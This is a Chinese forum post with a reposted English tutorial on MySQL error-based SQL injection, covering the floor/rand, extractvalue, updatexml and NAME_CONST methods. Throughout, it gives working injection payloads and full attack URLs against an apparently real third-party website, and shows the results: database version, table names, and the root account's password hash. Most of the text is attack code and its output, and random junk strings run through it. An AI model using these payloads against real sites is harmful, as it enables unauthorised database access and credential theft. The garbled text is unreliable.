|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:# c/ w5 \. `: X, M6 {
首先进行正常查询: mysql> select * from article where id = 1;
. d% r" p9 O1 k( O+—-+——-+———+
8 o ]1 z9 u( m$ q| id | title | content |' c+ }- i v3 c( }
+—-+——-+———+
* ?! |+ X. u* C2 D. @$ G| 1 | test | do it |6 A: Y4 @! a2 w
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
- N2 R+ p5 }7 B6 @2 J" S/ SERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。' J- X5 f; _ G7 O6 O
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);0 t1 [% u; a7 H+ ^. p/ x
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
# Q, G& s, x- P c6 u4 G! ^1 Y8 ^, NERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
9 z) _- q, J5 o1 x1 k测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–% F5 |: `1 ?1 L% M
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ ' r1 L' O. ]+ } z) g0 B- j
" z! j- |0 ~* `: l7 h2 L
再收集: 2 ^/ P4 q$ i: F0 u
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 5 V5 U5 A3 s' l& v
2 B: \ a C, h1 Q/ D! xError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’, C( L# b/ v: P6 i
, N0 n- M* U+ s
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
3 P/ q$ T" o( N% ^
0 R- J9 s7 P7 ?4 J; i) j) cErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
* I# w7 I/ s! p' t& s
" E* t Y5 W2 S7 K& uMYSQL高版本报错注入技巧-利用NAME_CONST注入
% G$ z6 H! `7 j4 f. ]0 rIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. . @% E2 z8 X% w
- s+ j: s; K6 y( u; u5 B, Y0 s7 w
9 Q h4 J( {1 R& K" y7 @8 _0 D- y相关信息% s$ h# D6 g+ K! p
, ^$ P( B7 J3 H1 cNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
3 M5 R j0 |1 q& f" R% a* G9 v5 b4 \/ R2 k x
Code:
7 p/ J0 E/ s- C# S6 |* y% l# ?NAME_CONST(DATA, VALUE)! u" d* Y2 O& q8 X# A: A: U3 Z
- R3 f! P8 H {9 }
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
- X+ K% Y6 H4 u# [% n6 }2 H' ~/ ^" ?" t/ N/ H
SELECT NAME_CONST('TEST', 1)
# W, J5 X' E- _( j$ S1 Y) R0 @' [6 ?: G
7 T4 s5 L- X& G1 n0 _& Z! k3 ~, G4 Q7 w$ S" g
|---------------|) m0 b2 F0 C2 `2 q$ @) N! F
| TEST |- @/ `) h! R) @' F" T2 j; p) j
| |
: ?( ^3 B9 [6 T/ w4 t5 |% {: K|---------------|
1 U0 v4 V$ ^( P& [) x- |/ g| 1 |" a% G+ {! w# O! I- W. @3 b1 G
| |/ w* m$ {2 R. U8 E% @- Q
|---------------|
. i+ b$ [+ X. m2 I+ U) Z' |7 l# }
% \# P$ }1 a2 L( s+ c/ n' u$ D, _: v/ C l3 d/ Y
! a' @/ e. [+ d3 G9 A8 @6 F/ d
7 Z" @( [: ]$ N9 {+ q+ q
http://dev.mysql.com/doc/refman/5.0/en/m...name-const, W8 h! P$ D- W `/ d: j" E
Intro to MySQL Variables
; e1 v3 Z3 m$ w% i3 B' ^2 y/ X% M8 M; t7 Z( H1 Y5 w+ r
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
0 h3 [+ @( y- e, d
# |$ L% `. Z! h7 A" \Code:4 l6 r; Q( a$ \) ?' n
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
3 ?) x7 {* G1 X; Z$ D8 j# \" t# U i* @% s
& T. _& P. j2 [" G! X& ~) a/ I
5 |. B( \- b8 L% r7 P
: K1 t" Q L, o8 Q& T- j
& [4 K. A9 l2 i- C" J9 A/ ^Code:
( z) w7 c8 k8 ]and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
5 z* ~" b5 R- p* B, I" k) H* Q7 v& {3 j6 b# P$ p1 x3 y2 g
* q/ w0 c# s2 _; v$ { H
VAR = Your MySQL variable.
7 V5 O1 @& e# l" Z6 n# H. h5 E; P3 F* n
MySQL 5.1.3 Server System Variables
9 ]7 I7 p, A" q3 e* W- b2 w7 B
+ |0 Q( Y% Z b3 l. @/ sLet's try it out on my site..' w3 _& v- N* _, E0 T5 ?
8 b6 [- ? F% j) T( E+ PCode:! @) k& [2 V/ v3 Z! u+ C
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
; Q$ e1 }% ^7 o) }9 [( |! G5 P; O5 ?: K
Erroruplicate column name '5.0.27-community-nt'
7 Y7 L1 l# m1 h3 j7 P
2 G. R4 X: u0 g% ?2 a; T+ m8 O
' @; d4 |' ]+ f, ]
* n4 K7 z! X: X
0 k5 j8 o: x& P) w- B# M' S! D+ T/ K6 \" p7 q: j+ ~
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
5 n, g% b/ }+ B& T% t0 J; u7 \
8 `. c1 p5 q* D0 [5 K( P) fData Extraction
# ]- o( ~+ Q4 m( R- d
! z6 W, c$ @7 `9 ^1 W9 LCode:
6 a0 r! e3 ^3 f9 l$ ~+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
& _. Q" w" _4 p: r9 ^$ v" I+ o" L: F
/ z# V$ p$ N- i8 n) G) Q8 x1 u
We should get a duplicate column 1 error...
/ r& k1 n( P7 w) ^
e" R9 y6 B* T/ ]! F8 VCode:
/ p# V& a/ a9 O" o `) w3 chttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--- J( z* R& h8 F
2 c# ]+ F! |+ N5 ?) t" a
Erroruplicate column name '1
) |0 N+ [7 J) h- C9 O1 X( R0 l0 i% Z( x" {4 S8 a
: c u8 M0 k% Z4 [1 K8 D/ T) e
" r% G& g* A0 B+ _" w) {3 o& |6 M) I& f; X
/ E' N. y- Y& W# i! J' Z9 l
8 t+ ?8 G4 |) k4 f7 I5 K, s( hNow let's get the tables out this bitch..
7 V0 T! d' U" U! s* P
' @ [. f" h! ?- hCode:
+ y- W2 g% B5 a7 N' m+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
+ U, n6 h2 A, o8 z8 ~& @: {2 _8 X& |# _9 ~
. W; I# I* ?2 y% sLet's see if it works here, if it does, we can go on and finish the job.8 F! k, O& v+ q! ?! d0 `
1 m" x* V0 Y4 Z. ~7 `/ Z3 KCode:6 o ^# L* g% P
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--- ?) S$ J% \& X+ j; j* k3 M' K
9 S2 @5 H) r$ i4 H6 b
6 t, y2 {/ R1 c0 e$ R% N, s+ A
Erroruplicate column name 'com_admanage
! Y7 V" j( \6 c0 @7 j ]7 K P2 O: |+ @, o7 O
8 a, a3 m9 K$ g. L0 ^( K8 j6 V: S" `+ l1 {( \3 T
: v# b$ e$ e+ P5 U9 j! I! ]
7 C/ X8 G7 ? e# n( @6 h+ n, K# v4 A, T# P
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
d9 o$ H( ]4 P2 r- x$ O( @7 d
, N( Z' c! ~# Z w: DLet's get the columns out of the user table..
: z2 d9 }: B5 n6 c9 |# X$ e+ P: R+ m# g0 _/ q) B
Code: U) J) q& z; V% Y( g9 B/ V/ Q1 @
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
. g% R/ C8 p" o! J; ?/ z5 F# K4 P9 Y9 B2 @
8 W4 X0 n( G5 Y: }
So mine looks like this, and I get the duplicate column name 'Host'.4 ^8 w D- }: `' o* w. E$ H: j
; [$ K9 ^: ^4 o( U7 xCode:
) n; d% s& J2 ^1 K2 ]% K7 `1 xhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--. h- b6 k4 \! T" u. }
9 t$ G1 E2 k8 V' r( o4 X1 v+ y
Erroruplicate column name 'Host'8 w7 P) D" R" b3 f* J
" W" }, h7 G) _7 Y, P. E
' m- ~: H* B; ^( r4 i: T
F0 ], _5 t6 f; q- K& `* q
; g1 g/ S9 |. x
8 S5 h) u9 A) j' B% Z8 @ i$ _: f4 a5 }# C) D/ L# `* P7 \3 g
Woot, time to finish this bitch off.: n0 E# a! E$ [
/ |3 g3 n" @4 C1 C7 ]2 L) M$ n
Code:
}, A; o. h: Z( h) S3 E- g5 x8 u/ z+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--$ L$ I. v% j) V+ Z+ L& E l+ S
8 z# O m N6 O3 v4 i( I g
6 @! z: w9 ~6 }' l7 d4 P* t9 n2 l9 W; \So mine looks like this..., |" b( \# M3 I7 Y
/ D' Y! y4 a: s2 |' u9 }( w) LCode:! c1 j) D9 m1 D' L2 o! i
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--. v! u4 e. B: ~
3 k9 i6 T Z! q" nErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
. l: u+ L. F, o4 Y7 Y4 `9 Y- K: I! X& a. H4 q+ \) R4 o
/ {! L. w/ f, H+ Z1 @& w
4 v- A! ]( t1 q) k3 J8 [
4 x/ b% N/ n3 |% R5 d6 g' k
! T1 l8 t1 ]3 ]4 n
! ? i# Z' J( R- CAnd there we have it, thanks for reading. Y4 M6 ^( K- Z& p# |5 S% i
' }6 m. l+ ~7 r4 [& r
|
发表于 2015-11-11 19:03:37
收藏
支持
反对